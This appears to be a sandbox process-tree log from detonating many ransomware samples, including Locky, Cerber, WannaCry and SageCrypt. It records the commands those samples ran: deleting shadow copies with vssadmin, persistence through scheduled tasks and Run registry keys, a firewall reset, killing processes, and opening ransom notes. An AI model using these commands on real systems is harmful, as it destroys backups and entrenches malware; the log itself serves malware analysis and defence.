        • C:\Users\Admin\Desktop\00299\Trojan-Ransom.Win32.Blocker.kcal-c8958df49eb3851df6d3c759f85c8d8a892d24baa7d0f7483431e8debd2a1fcc.exe
          Trojan-Ransom.Win32.Blocker.kcal-c8958df49eb3851df6d3c759f85c8d8a892d24baa7d0f7483431e8debd2a1fcc.exe
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: CmdExeWriteProcessMemorySpam
          PID:1932
          • C:\Users\Admin\AppData\Roaming\msntdll.exe
            "C:\Users\Admin\AppData\Roaming\msntdll.exe" "del" C:\Users\Admin\Desktop\00299\Trojan-Ransom.Win32.Blocker.kcal-c8958df49eb3851df6d3c759f85c8d8a892d24baa7d0f7483431e8debd2a1fcc.exe
            4⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:2764
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /C schtasks /create /sc onlogon /s KHBTHJFA /tn msntdll.exe /tr C:\Users\Admin\AppData\Roaming\msntdll.exe
              5⤵
              • System Location Discovery: System Language Discovery
              PID:4080
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /sc onlogon /s KHBTHJFA /tn msntdll.exe /tr C:\Users\Admin\AppData\Roaming\msntdll.exe
                6⤵
                • System Location Discovery: System Language Discovery
                • Scheduled Task/Job: Scheduled Task
                PID:2904
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c ""C:\Users\Admin\Desktop\00299\UPCU.bat" "
              5⤵
                PID:1728
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v msntdll.exe /t REG_SZ /d C:\Users\Admin\AppData\Roaming\msntdll.exe
                  6⤵
                  • Adds Run key to start application
                  • System Location Discovery: System Language Discovery
                  • Modifies registry key
                  PID:4036
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" del UPCU.bat"
                  6⤵
                    PID:1752
            • C:\Users\Admin\Desktop\00299\Trojan-Ransom.Win32.Crusis.to-a683494fc0d017fd3b4638f8b84caaaac145cc28bc211bd7361723368b4bb21e.exe
              Trojan-Ransom.Win32.Crusis.to-a683494fc0d017fd3b4638f8b84caaaac145cc28bc211bd7361723368b4bb21e.exe
              3⤵
              • Drops startup file
              • Executes dropped EXE
              • Adds Run key to start application
              • Drops desktop.ini file(s)
              • Drops file in System32 directory
              • Drops file in Program Files directory
              • Suspicious behavior: CmdExeWriteProcessMemorySpam
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious behavior: RenamesItself
              • Suspicious use of WriteProcessMemory
              PID:900
              • C:\Windows\system32\cmd.exe
                "C:\Windows\system32\cmd.exe"
                4⤵
                  PID:2908
                  • C:\Windows\system32\mode.com
                    mode con cp select=1251
                    5⤵
                      PID:2808
                    • C:\Windows\system32\vssadmin.exe
                      vssadmin delete shadows /all /quiet
                      5⤵
                      • Interacts with shadow copies
                      PID:3736
                  • C:\Windows\system32\cmd.exe
                    "C:\Windows\system32\cmd.exe"
                    4⤵
                      PID:2752
                      • C:\Windows\system32\mode.com
                        mode con cp select=1251
                        5⤵
                          PID:6220
                        • C:\Windows\system32\vssadmin.exe
                          vssadmin delete shadows /all /quiet
                          5⤵
                          • Interacts with shadow copies
                          PID:4644
                      • C:\Windows\System32\mshta.exe
                        "C:\Windows\System32\mshta.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"
                        4⤵
                        • Modifies Internet Explorer settings
                        PID:3704
                      • C:\Windows\System32\mshta.exe
                        "C:\Windows\System32\mshta.exe" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"
                        4⤵
                        • Modifies Internet Explorer settings
                        PID:6252
                    • C:\Users\Admin\Desktop\00299\Trojan-Ransom.Win32.Crypren.adra-79271d57c531c79536bc0be0d71e3a372bed9c10689257a7727475ab41e3e161.exe
                      Trojan-Ransom.Win32.Crypren.adra-79271d57c531c79536bc0be0d71e3a372bed9c10689257a7727475ab41e3e161.exe
                      3⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                      PID:1620
                    • C:\Users\Admin\Desktop\00299\Trojan-Ransom.Win32.Cryptor.aoo-56081040edb1e713c2abd6ef38f3f5f9e7abc4c723dc19f598b67d536a2db9a1.exe
                      Trojan-Ransom.Win32.Cryptor.aoo-56081040edb1e713c2abd6ef38f3f5f9e7abc4c723dc19f598b67d536a2db9a1.exe
                      3⤵
                      • Executes dropped EXE
                      • Sets desktop wallpaper using registry
                      • System Location Discovery: System Language Discovery
                      • Modifies Control Panel
                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                      PID:960
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd.exe /C del /Q /F "C:\Users\Admin\AppData\Local\Temp\sys842D.tmp"
                        4⤵
                        • System Location Discovery: System Language Discovery
                        PID:4316
                    • C:\Users\Admin\Desktop\00299\Trojan-Ransom.Win32.Foreign.nnvv-df67c027355f9543d93d0986834ea437fce8afaa8f1fc31fe065db7db29f8916.exe
                      Trojan-Ransom.Win32.Foreign.nnvv-df67c027355f9543d93d0986834ea437fce8afaa8f1fc31fe065db7db29f8916.exe
                      3⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                      PID:2880
                      • C:\Users\Admin\Desktop\00299\Trojan-Ransom.Win32.Foreign.nnvv-df67c027355f9543d93d0986834ea437fce8afaa8f1fc31fe065db7db29f8916.exe
                        C:\Users\Admin\Desktop\00299\Trojan-Ransom.Win32.Foreign.nnvv-df67c027355f9543d93d0986834ea437fce8afaa8f1fc31fe065db7db29f8916.exe
                        4⤵
                        • Modifies WinLogon for persistence
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Adds Run key to start application
                        • System Location Discovery: System Language Discovery
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3080
                        • C:\Users\Admin\AppData\Local\Temp\DCSCMIN\fMDCa.exe
                          "C:\Users\Admin\AppData\Local\Temp\DCSCMIN\fMDCa.exe"
                          5⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of SetThreadContext
                          • System Location Discovery: System Language Discovery
                          PID:1696
                          • C:\Users\Admin\AppData\Local\Temp\DCSCMIN\fMDCa.exe
                            C:\Users\Admin\AppData\Local\Temp\DCSCMIN\fMDCa.exe
                            6⤵
                            • Executes dropped EXE
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of SetWindowsHookEx
                            PID:3924
                    • C:\Users\Admin\Desktop\00299\Trojan-Ransom.Win32.Foreign.nnwb-4041453aabda450faeaa6f9950b66832626570eea305ae69bcfd7b62db0645d4.exe
                      Trojan-Ransom.Win32.Foreign.nnwb-4041453aabda450faeaa6f9950b66832626570eea305ae69bcfd7b62db0645d4.exe
                      3⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                      PID:1132
                      • C:\Users\Admin\Desktop\00299\Trojan-Ransom.Win32.Foreign.nnwb-4041453aabda450faeaa6f9950b66832626570eea305ae69bcfd7b62db0645d4.exe
                        C:\Users\Admin\Desktop\00299\Trojan-Ransom.Win32.Foreign.nnwb-4041453aabda450faeaa6f9950b66832626570eea305ae69bcfd7b62db0645d4.exe
                        4⤵
                        • Modifies WinLogon for persistence
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Adds Run key to start application
                        • System Location Discovery: System Language Discovery
                        PID:5792
                        • C:\Users\Admin\AppData\Local\Temp\DCSCMIN\mtxu5caXzLQy\fMDCa.exe
                          "C:\Users\Admin\AppData\Local\Temp\DCSCMIN\mtxu5caXzLQy\fMDCa.exe"
                          5⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of SetThreadContext
                          • System Location Discovery: System Language Discovery
                          PID:4900
                          • C:\Users\Admin\AppData\Local\Temp\DCSCMIN\mtxu5caXzLQy\fMDCa.exe
                            C:\Users\Admin\AppData\Local\Temp\DCSCMIN\mtxu5caXzLQy\fMDCa.exe
                            6⤵
                            • Executes dropped EXE
                            • System Location Discovery: System Language Discovery
                            PID:3328
                    • C:\Users\Admin\Desktop\00299\Trojan-Ransom.Win32.Foreign.nokw-98d179f325c65cbf837af0e49fa6f6dfae6e9e047402c50877730b97cfebfc58.exe
                      Trojan-Ransom.Win32.Foreign.nokw-98d179f325c65cbf837af0e49fa6f6dfae6e9e047402c50877730b97cfebfc58.exe
                      3⤵
                      • Executes dropped EXE
                      • Adds Run key to start application
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                      • Suspicious use of AdjustPrivilegeToken
                      PID:768
                    • C:\Users\Admin\Desktop\00299\Trojan-Ransom.Win32.Foreign.noor-cc70e724d09f7144245bb5dabb5a04735918ad3fbdd408dab9030283e90b4a93.exe
                      Trojan-Ransom.Win32.Foreign.noor-cc70e724d09f7144245bb5dabb5a04735918ad3fbdd408dab9030283e90b4a93.exe
                      3⤵
                      • Executes dropped EXE
                      • Adds Run key to start application
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                      • Suspicious behavior: GetForegroundWindowSpam
                      PID:1356
                    • C:\Users\Admin\Desktop\00299\Trojan-Ransom.Win32.Locky.aabg-539f15847c5861e602a94c04f30fc27997e1b7b1f8dc3b26be568fbc8bcbe706.exe
                      Trojan-Ransom.Win32.Locky.aabg-539f15847c5861e602a94c04f30fc27997e1b7b1f8dc3b26be568fbc8bcbe706.exe
                      3⤵
                      • Executes dropped EXE
                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                      PID:1596
                    • C:\Users\Admin\Desktop\00299\Trojan-Ransom.Win32.Locky.aave-dcf0d21c2ef66ab3d2ca1c7a0741556f7d20f8c1349b131df39df0a25bede5f9.exe
                      Trojan-Ransom.Win32.Locky.aave-dcf0d21c2ef66ab3d2ca1c7a0741556f7d20f8c1349b131df39df0a25bede5f9.exe
                      3⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                      PID:1972
                    • C:\Users\Admin\Desktop\00299\Trojan-Ransom.Win32.Locky.aeuv-7582e36985e804e1115e91694b818e5bf17a6175a637c3e36754df861072e7e7.exe
                      Trojan-Ransom.Win32.Locky.aeuv-7582e36985e804e1115e91694b818e5bf17a6175a637c3e36754df861072e7e7.exe
                      3⤵
                      • Executes dropped EXE
                      • Sets desktop wallpaper using registry
                      • System Location Discovery: System Language Discovery
                      • Modifies Control Panel
                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                      PID:1416
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd.exe /C del /Q /F "C:\Users\Admin\AppData\Local\Temp\sys7446.tmp"
                        4⤵
                        • System Location Discovery: System Language Discovery
                        PID:6104
                    • C:\Users\Admin\Desktop\00299\Trojan-Ransom.Win32.Locky.afet-8514a2eca4090f400a43c4af915eb3ef6e9c15dabe69716189e7c68c72cfa285.exe
                      Trojan-Ransom.Win32.Locky.afet-8514a2eca4090f400a43c4af915eb3ef6e9c15dabe69716189e7c68c72cfa285.exe
                      3⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                      PID:1392
                      • C:\Program Files\Internet Explorer\iexplore.exe
                        "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\lukitus.htm
                        4⤵
                          PID:4976
                          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4976 CREDAT:275457 /prefetch:2
                            5⤵
                              PID:3416
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /C del /Q /F "C:\Users\Admin\AppData\Local\Temp\sysC9E4.tmp"
                            4⤵
                              PID:5520
                          • C:\Users\Admin\Desktop\00299\Trojan-Ransom.Win32.Locky.afgz-c713b2ba0e8a6d4dfc34b628fdaff58bbd859fb9139a20786d4a4127968690ac.exe
                            Trojan-Ransom.Win32.Locky.afgz-c713b2ba0e8a6d4dfc34b628fdaff58bbd859fb9139a20786d4a4127968690ac.exe
                            3⤵
                            • Executes dropped EXE
                            • Sets desktop wallpaper using registry
                            • Modifies Control Panel
                            • Modifies system certificate store
                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                            PID:1524
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd.exe /C del /Q /F "C:\Users\Admin\AppData\Local\Temp\sys7DBA.tmp"
                              4⤵
                                PID:5728
                            • C:\Users\Admin\Desktop\00299\Trojan-Ransom.Win32.Locky.afmm-56c63fd3c9cc655e4cb815790b62f3c6830d24c47b9e03fd0927aa31aa993f60.exe
                              Trojan-Ransom.Win32.Locky.afmm-56c63fd3c9cc655e4cb815790b62f3c6830d24c47b9e03fd0927aa31aa993f60.exe
                              3⤵
                              • Executes dropped EXE
                              • Sets desktop wallpaper using registry
                              • Modifies Control Panel
                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                              PID:1836
                              • C:\Program Files\Internet Explorer\iexplore.exe
                                "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\ykcol.htm
                                4⤵
                                • Modifies Internet Explorer settings
                                • Suspicious use of SetWindowsHookEx
                                PID:7088
                                • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:7088 CREDAT:275457 /prefetch:2
                                  5⤵
                                  • Drops desktop.ini file(s)
                                  • System Location Discovery: System Language Discovery
                                  • Modifies Internet Explorer settings
                                  • Suspicious use of SetWindowsHookEx
                                  PID:6376
                                • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:7088 CREDAT:275463 /prefetch:2
                                  5⤵
                                  • System Location Discovery: System Language Discovery
                                  • Modifies Internet Explorer settings
                                  • Suspicious use of SetWindowsHookEx
                                  PID:3524
                                • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:7088 CREDAT:406532 /prefetch:2
                                  5⤵
                                  • System Location Discovery: System Language Discovery
                                  • Modifies Internet Explorer settings
                                  • Suspicious use of SetWindowsHookEx
                                  PID:2800
                                • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:7088 CREDAT:5256195 /prefetch:2
                                  5⤵
                                  • System Location Discovery: System Language Discovery
                                  • Modifies Internet Explorer settings
                                  • Suspicious use of SetWindowsHookEx
                                  PID:6932
                                • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:7088 CREDAT:5387267 /prefetch:2
                                  5⤵
                                  • System Location Discovery: System Language Discovery
                                  • Modifies Internet Explorer settings
                                  • Suspicious use of SetWindowsHookEx
                                  PID:6860
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd.exe /C del /Q /F "C:\Users\Admin\AppData\Local\Temp\sys62CB.tmp"
                                4⤵
                                • System Location Discovery: System Language Discovery
                                PID:1512
                            • C:\Users\Admin\Desktop\00299\Trojan-Ransom.Win32.Locky.cs-eee19c411a3e518cba1c930f20e566fb1af87a27c2a0290f87200da13bcdaff0.exe
                              Trojan-Ransom.Win32.Locky.cs-eee19c411a3e518cba1c930f20e566fb1af87a27c2a0290f87200da13bcdaff0.exe
                              3⤵
                              • Executes dropped EXE
                              • System Location Discovery: System Language Discovery
                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                              PID:1340
                            • C:\Users\Admin\Desktop\00299\Trojan-Ransom.Win32.Locky.dmp-2deaa0ec7445c26f1442f860eb32f4fcda2d501699d09a94c26035d6185803ea.exe
                              Trojan-Ransom.Win32.Locky.dmp-2deaa0ec7445c26f1442f860eb32f4fcda2d501699d09a94c26035d6185803ea.exe
                              3⤵
                              • Executes dropped EXE
                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                              PID:1712
                              • C:\Program Files\Internet Explorer\iexplore.exe
                                "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\lukitus.htm
                                4⤵
                                  PID:6888
                                  • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6888 CREDAT:275457 /prefetch:2
                                    5⤵
                                      PID:4492
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd.exe /C del /Q /F "C:\Users\Admin\AppData\Local\Temp\sys74C3.tmp"
                                    4⤵
                                      PID:5500
                                  • C:\Users\Admin\Desktop\00299\Trojan-Ransom.Win32.Locky.emd-f488204e040717d898235caea9afc64541c0cefdc1b9c25318c2b6d6fb740703.exe
                                    Trojan-Ransom.Win32.Locky.emd-f488204e040717d898235caea9afc64541c0cefdc1b9c25318c2b6d6fb740703.exe
                                    3⤵
                                    • Executes dropped EXE
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                    PID:2212
                                  • C:\Users\Admin\Desktop\00299\Trojan-Ransom.Win32.Locky.zbx-9aac311c5630c3d917f9d8eb9d93a4c7c2ca09cefa1d466dd6f681699202c883.exe
                                    Trojan-Ransom.Win32.Locky.zbx-9aac311c5630c3d917f9d8eb9d93a4c7c2ca09cefa1d466dd6f681699202c883.exe
                                    3⤵
                                    • Executes dropped EXE
                                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                    PID:2228
                                  • C:\Users\Admin\Desktop\00299\Trojan-Ransom.Win32.Locky.zmj-d1b8b8c6cce9175c844875a68b61e50107cd7b5d5c6ac2ec76dbb3b06ed727f8.exe
                                    Trojan-Ransom.Win32.Locky.zmj-d1b8b8c6cce9175c844875a68b61e50107cd7b5d5c6ac2ec76dbb3b06ed727f8.exe
                                    3⤵
                                    • Executes dropped EXE
                                    • Sets desktop wallpaper using registry
                                    • System Location Discovery: System Language Discovery
                                    • Modifies Control Panel
                                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                    PID:2496
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd.exe /C del /Q /F "C:\Users\Admin\AppData\Local\Temp\sys7243.tmp"
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:3988
                                  • C:\Users\Admin\Desktop\00299\Trojan-Ransom.Win32.Locky.ztv-99b0ebdeb576c983cfccf3612d6e3a41b380d0835ecc1b9e36b051d2788453ec.exe
                                    Trojan-Ransom.Win32.Locky.ztv-99b0ebdeb576c983cfccf3612d6e3a41b380d0835ecc1b9e36b051d2788453ec.exe
                                    3⤵
                                    • Executes dropped EXE
                                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                    PID:2356
                                  • C:\Users\Admin\Desktop\00299\Trojan-Ransom.Win32.Locky.zyh-8feb981439774342fbe7c7a25c21d9cbae58f4cc13feb0ebf3657a85f2142158.exe
                                    Trojan-Ransom.Win32.Locky.zyh-8feb981439774342fbe7c7a25c21d9cbae58f4cc13feb0ebf3657a85f2142158.exe
                                    3⤵
                                    • Executes dropped EXE
                                    • Sets desktop wallpaper using registry
                                    • Modifies Control Panel
                                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                    PID:2084
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd.exe /C del /Q /F "C:\Users\Admin\AppData\Local\Temp\sys7FAB.tmp"
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:3760
                                  • C:\Users\Admin\Desktop\00299\Trojan-Ransom.Win32.Purgen.nn-927e2a0e67eb309007d2e1b8d0e7738e6462afe48f289e36d2827c7787f7e2ba.exe
                                    Trojan-Ransom.Win32.Purgen.nn-927e2a0e67eb309007d2e1b8d0e7738e6462afe48f289e36d2827c7787f7e2ba.exe
                                    3⤵
                                    • Executes dropped EXE
                                    • Adds Run key to start application
                                    • Drops desktop.ini file(s)
                                    • Drops file in Program Files directory
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                    • Suspicious behavior: RenamesItself
                                    PID:2288
                                    • C:\Windows\SysWOW64\taskkill.exe
                                      taskkill /F /T /PID 1620
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      • Kills process with taskkill
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:3504
                                    • C:\Windows\SysWOW64\taskkill.exe
                                      taskkill /F /T /PID 1972
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      • Kills process with taskkill
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:3544
                                    • C:\Windows\SysWOW64\taskkill.exe
                                      taskkill /F /T /PID 1340
                                      4⤵
                                      • Kills process with taskkill
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:3132
                                    • C:\Windows\SysWOW64\taskkill.exe
                                      taskkill /F /T /PID 2212
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      • Kills process with taskkill
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:3552
                                  • C:\Users\Admin\Desktop\00299\Trojan-Ransom.Win32.SageCrypt.cod-ad1dc1a4c3c42773ea67f79367b24394c87a952e38c27d280022bb49fa2d1ee4.exe
                                    Trojan-Ransom.Win32.SageCrypt.cod-ad1dc1a4c3c42773ea67f79367b24394c87a952e38c27d280022bb49fa2d1ee4.exe
                                    3⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                    PID:2524
                                    • C:\Users\Admin\Desktop\00299\Trojan-Ransom.Win32.SageCrypt.cod-ad1dc1a4c3c42773ea67f79367b24394c87a952e38c27d280022bb49fa2d1ee4.exe
                                      "C:\Users\Admin\Desktop\00299\Trojan-Ransom.Win32.SageCrypt.cod-ad1dc1a4c3c42773ea67f79367b24394c87a952e38c27d280022bb49fa2d1ee4.exe" g
                                      4⤵
                                      • Executes dropped EXE
                                      PID:4092
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      "C:\Windows\System32\schtasks.exe" /CREATE /TN "N0mFUQoa" /TR "C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe" /SC ONLOGON /RL HIGHEST /F
                                      4⤵
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:3104
                                    • C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe
                                      "C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe"
                                      4⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • Enumerates connected drives
                                      • Sets desktop wallpaper using registry
                                      • System Location Discovery: System Language Discovery
                                      • Modifies Control Panel
                                      • Modifies data under HKEY_USERS
                                      • Modifies registry class
                                      PID:2900
                                      • C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe
                                        "C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe" g
                                        5⤵
                                        • Executes dropped EXE
                                        • System Location Discovery: System Language Discovery
                                        PID:1868
                                      • C:\Windows\SysWOW64\vssadmin.exe
                                        "C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet
                                        5⤵
                                        • System Location Discovery: System Language Discovery
                                        • Interacts with shadow copies
                                        PID:4428
                                      • C:\Windows\SysWOW64\vssadmin.exe
                                        "C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet
                                        5⤵
                                        • System Location Discovery: System Language Discovery
                                        • Interacts with shadow copies
                                        PID:3232
                                      • C:\Windows\SysWOW64\vssadmin.exe
                                        "C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet
                                        5⤵
                                        • Interacts with shadow copies
                                        PID:5752
                                      • C:\Windows\SysWOW64\mshta.exe
                                        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\!HELP_SOS.hta"
                                        5⤵
                                        • System Location Discovery: System Language Discovery
                                        • Modifies Internet Explorer settings
                                        PID:4272
                                      • C:\Windows\SysWOW64\WScript.exe
                                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f1.vbs"
                                        5⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:4240
                                    • C:\Windows\SysWOW64\WScript.exe
                                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f252888.vbs"
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:1588
                                  • C:\Users\Admin\Desktop\00299\Trojan-Ransom.Win32.Wanna.c-6a0ec29f934314016e28a6145b25e8f401abf7fbd77229dfaa729fad55dd31b3.exe
                                    Trojan-Ransom.Win32.Wanna.c-6a0ec29f934314016e28a6145b25e8f401abf7fbd77229dfaa729fad55dd31b3.exe
                                    3⤵
                                    • Executes dropped EXE
                                    • Sets desktop wallpaper using registry
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                    • Suspicious use of SetWindowsHookEx
                                    PID:2148
                                  • C:\Users\Admin\Desktop\00299\Trojan-Ransom.Win32.Wanna.zbu-0a2bab1c970ea52bd82d1193caab0e7ef4a9d0e47f1afca32a5550481974ca72.exe
                                    Trojan-Ransom.Win32.Wanna.zbu-0a2bab1c970ea52bd82d1193caab0e7ef4a9d0e47f1afca32a5550481974ca72.exe
                                    3⤵
                                    • Executes dropped EXE
                                    PID:2268
                                  • C:\Users\Admin\Desktop\00299\Trojan-Ransom.Win32.Zerber.dong-ca1be829d5f0b285fc7e61f3d45ba5f2b585f971792455494894ae352507eb3c.exe
                                    Trojan-Ransom.Win32.Zerber.dong-ca1be829d5f0b285fc7e61f3d45ba5f2b585f971792455494894ae352507eb3c.exe
                                    3⤵
                                    • Cerber
                                    • Drops startup file
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    • Drops file in System32 directory
                                    • Sets desktop wallpaper using registry
                                    • Drops file in Windows directory
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                    PID:3772
                                    • C:\Windows\SysWOW64\netsh.exe
                                      C:\Windows\system32\netsh.exe advfirewall set allprofiles state on
                                      4⤵
                                      • Modifies Windows Firewall
                                      • Event Triggered Execution: Netsh Helper DLL
                                      • System Location Discovery: System Language Discovery
                                      PID:1924
                                    • C:\Windows\SysWOW64\netsh.exe
                                      C:\Windows\system32\netsh.exe advfirewall reset
                                      4⤵
                                      • Modifies Windows Firewall
                                      • Event Triggered Execution: Netsh Helper DLL
                                      • System Location Discovery: System Language Discovery
                                      PID:3780
                                    • C:\Windows\SysWOW64\mshta.exe
                                      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\_READ_THIS_FILE_IKQSZZH_.hta"
                                      4⤵
                                      • Blocklisted process makes network request
                                      • Modifies Internet Explorer settings
                                      PID:5904
                                    • C:\Windows\SysWOW64\NOTEPAD.EXE
                                      "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\_READ_THIS_FILE_HTDKUH52_.txt
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      • Opens file in notepad (likely ransom note)
                                      PID:3352
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\system32\cmd.exe"
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:4464
                                      • C:\Windows\SysWOW64\taskkill.exe
                                        taskkill /f /im "Trojan-Ransom.Win32.Zerber.dong-ca1be829d5f0b285fc7e61f3d45ba5f2b585f971792455494894ae352507eb3c.exe"
                                        5⤵
                                        • Cerber
                                        • System Location Discovery: System Language Discovery
                                        • Kills process with taskkill
                                        PID:4576
                                      • C:\Windows\SysWOW64\PING.EXE
                                        ping -n 1 127.0.0.1
                                        5⤵
                                        • System Location Discovery: System Language Discovery
                                        • System Network Configuration Discovery: Internet Connection Discovery
                                        • Runs ping.exe
                                        PID:6156
                                  • C:\Users\Admin\Desktop\00299\Trojan-Ransom.Win32.Zerber.egjd-ca52de5179a6230958215313850d49cfaee8894e32c73f3cbff8bd6ab6ff52d7.exe
                                    Trojan-Ransom.Win32.Zerber.egjd-ca52de5179a6230958215313850d49cfaee8894e32c73f3cbff8bd6ab6ff52d7.exe
                                    3⤵
                                    • Executes dropped EXE
                                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                    PID:3780
                                  • C:\Users\Admin\Desktop\00299\VHO-Trojan-Ransom.Win32.Blocker.gen-5e2e4c1d7b08869da0c2eafe8c0fdc17951b449670cb69b889ab0614a4eaeaff.exe
                                    VHO-Trojan-Ransom.Win32.Blocker.gen-5e2e4c1d7b08869da0c2eafe8c0fdc17951b449670cb69b889ab0614a4eaeaff.exe
                                    3⤵
                                    • Executes dropped EXE
                                    PID:3788
                                    • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
                                      dw20.exe -x -s 508
                                      4⤵
                                        PID:2812
                                  • C:\Windows\regedit.exe
                                    "C:\Windows\regedit.exe"
                                    2⤵
                                    • Runs regedit.exe
                                    PID:5068
                                • C:\Windows\system32\DllHost.exe
                                  C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                  1⤵
                                    PID:1424
                                  • C:\Windows\system32\conhost.exe
                                    \??\C:\Windows\system32\conhost.exe "1759776916-1299711641473809361883763359-1973734841-1653827117781528128-1508191693"
                                    1⤵
